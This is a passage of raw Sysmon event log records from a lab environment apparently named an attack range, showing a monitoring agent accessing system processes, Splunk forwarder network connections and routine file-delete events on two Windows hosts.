12:28:22.662{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018211Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.656{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018210Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.654{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018209Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.642{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018208Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.632{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018207Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.623{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018206Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.617{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018205Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.610{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018204Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.580{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018203Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.573{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018202Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.564{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018201Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.554{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018200Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.552{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018199Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.549{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018198Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.546{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000018197Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.541{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 354300x800000000000000018196Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:20.910{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50171-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018195Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:22.088{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44ACFFFF7ACF91A2AC6265B18B67D904,SHA256=4182E0FB31A994ADC85D07DEC2E7E0F2532E7895FCD459621DD8A8CF7920C4BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045890Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:19.715{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56446-false10.0.1.12-8000- 23542300x800000000000000045892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:23.619{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16564143D415BDB147CC14DB6305380E,SHA256=80988395C77ECEED17A8C8CB94B1E956B0AA532FC5E332CC0FA428BEEC50CE8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018228Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:23.348{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEC58EC9EC7EF5D24917BA71C7321B9A,SHA256=2357C94360214A413309A6162DAEF497F986375126D609E29BDA748CEC11D686,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:24.880{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:24.880{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000045893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:24.739{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C01C480EBD8E8AEFA14276843743BAE,SHA256=61F2EDD76EAAC485A968E6F8BEE15CE25489355FC777D9900D5938D1AB5E80CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018229Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:24.367{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14F7CCA909A974119567ABD2A303A794,SHA256=5395FDAC1BE2D443BDFD1D782739ED3E4E354EDF410440B9C90E841ED09A979F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:25.842{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A961B3A1C2C0202B5E5F42A0A49146BC,SHA256=57BC9A6AC05DAA9B8229C35D00E4DE456C4B35F77C033CFBCBA74F1572666E1D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018234Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:25.675{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018233Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:25.675{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018232Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:25.675{E5A8D418-DC43-63C7-0B00-00000000B002}6323836C:\Windows\system32\lsass.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018231Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:25.659{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018230Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:25.445{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEC410B95D4E2EA9F9F659E4E61F6D38,SHA256=EAD9681C5B1D4E211F3F0E9DCCDC7CB08CB1800008309473A010AAE161943712,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045899Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:26.948{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37DB04E669E364D3D43E51876A118365,SHA256=94CF0598B6F720EE27BD68173E209250E5BA8AB0FCE24477BCCD3A9EBD5147CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018235Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:26.520{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F05596B5AA64B8C546E0E60C05A1994C,SHA256=008BB0ABC7BEE5691EB96D8DEDFB2B4BCA602DE18D375F40794D293FB4F93475,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045898Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:26.604{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=C1B4B136B2D4479FCDC52A44FD014EE3,SHA256=FCD7C97482F28E2D4A3D8516754259B96BB5A53307F042535C374F7B5056C556,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:26.604{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018236Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:27.603{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DAFDDFC253ECD9EE3978254405E73D3,SHA256=990D1B1530A6DB3C111C33401E9ADF010262EB81CC7CECAC8E56E3076D0D05CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045900Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:27.753{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 